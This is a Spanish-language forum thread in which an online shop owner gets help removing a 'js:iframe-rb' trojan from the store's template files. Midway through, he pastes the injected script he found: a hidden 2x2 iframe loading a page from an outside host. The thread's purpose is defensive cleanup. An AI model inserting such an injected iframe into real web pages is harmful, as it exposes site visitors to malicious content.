Virus: " js:iframe-rb [Trj] " ¿Cómo proceder?

[alvarito]

Desde hace un tiempo no puedo acceder ni a mi pestañita de "Pago" ni a la de "Módulos" en mi tienda online debido a este virús, que me detecta el Avast como un troyano: js:iframe-rb [Trj]

He estado informándome del tema y básicamente he descubierto que es un virús que puede meterse en mis archivos y suelen estar en decode64 sino me equivoco. El caso es que no sé en que archivos específicos mirar, o mirar en todos, que buscar y que no.

¿Alguien tiene alguna de idea de como debo proceder?

 

Muchas gracias adelantadas. Un saludo.

[AMA1MD]

Te explico, aunque lleva algo de trabajo,

 

Descarga tu web completa en local

Create un sitio con dreamweaver por ejemplo

Busca la siguiente cadena "base64_decode"

Todos los archivos que tengan ese codigo han sido manipulados y debes eliminar el codigo malicioso.

 

Cambia todas las claves, bd, bo, panel hosting, etc

[alvarito]

Muchas gracias por las respuestas pero disculparme por mi inexperiencia. Ya he descargato toda mi carpeta public_html que imagino es la web. ¿Tienes por ahi alguna web o tutorial en donde explique lo del dreamweaver? Es que nunca he usado ese programa ni se como buscar el codigo con ese programa. (Lo único que yo sabría hacer es abrir todos los archivos con el note++ y buscar el codigo, que sino queda otra lo hago así).

 

Un saludo.

[nadie]

Muchas gracias por las respuestas pero disculparme por mi inexperiencia. Ya he descargato toda mi carpeta public_html que imagino es la web. ¿Tienes por ahi alguna web o tutorial en donde explique lo del dreamweaver? Es que nunca he usado ese programa ni se como buscar el codigo con ese programa. (Lo único que yo sabría hacer es abrir todos los archivos con el note++ y buscar el codigo, que sino queda otra lo hago así).

 

Un saludo.

 

Lo puedes hacer con notepad++ sin problemas.

[alvarito]

Gracias ya me puse a ello.

 

EL antivirus me detecto 18 archivos infectados con "js:iframe-rb [Trj]" , todos ellos con terminación .tpl a lo largo de toda la carpeta public_html.

En todos los archivos que menciona encontre esta linea:

 

<body><!--c3284d--><script type="text/javascript">

document.write('<iframe src="http://pairedpixels.com/vaca/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

</script><!--/c3284d-->

 

¿Con borrar esta linea de todos los archivos, resubir los 18 archivos y cambiar las claves de los servidores deberia solucionarse?

Como ya dije es que soy un neofito en el tema y quiero estar seguro de lo que hago.

 

 

Un saludo y gracias.

[AMA1MD]

efectivamente.

[nadie]

¿Con borrar esta linea de todos los archivos, resubir los 18 archivos?

 

Abre los ficheros con el notepad+++ (lógicamente no 1 a 1, sino todos de golpe)

 

Desde el Notepad++ -> pulsa en buscar, en ese momento se te abrira una ventanita, hay pulsa en reemplazar, señalas lo que vas a buscar (el codigo maligno) y por que lo vas a reemplazar (por ejemplo un espacio en blanco) y pulsas en Reemplazar en todos los archivos abiertos.

[nadie]

¿cambiar las claves de los servidores deberia solucionarse?

 

Supongo que debes tener un panel en tu hosting, hay podrás cambiar todas las claves.

[alvarito]

Hola, esto puede que te ayude: http://www.4webs.es/...ccion-de-codigo

 

Espero lo soluciones.

 

Saludos

 

Buenas, seguí el tutorial del herfix.php ya que tenia el archivo her.php en los módulos. Así que hice todo el tutorial pero al terminar el avast me detectaba virus en todas las páginas, incluida la principal por lo que no podía cargar ninguna página. Metí un backup y probé borrando las lineas de código que comenté mediante el note++, en los archivos que detectaba el avast. Con este método no empeoró, pero tampoco mejoró detectandome virus en la pestaña de pagos y en la de modulos como ya me pasaba.

Ya se me han acabado las ideas, ¿alguna por ahi para seguir probando?

 

Un saludo y gracias por las ayudas.

[AMA1MD]

Si te sigue apareciendo virus es que te has dejado codigo malicioso en tu sitio, vuelve a revisarlo.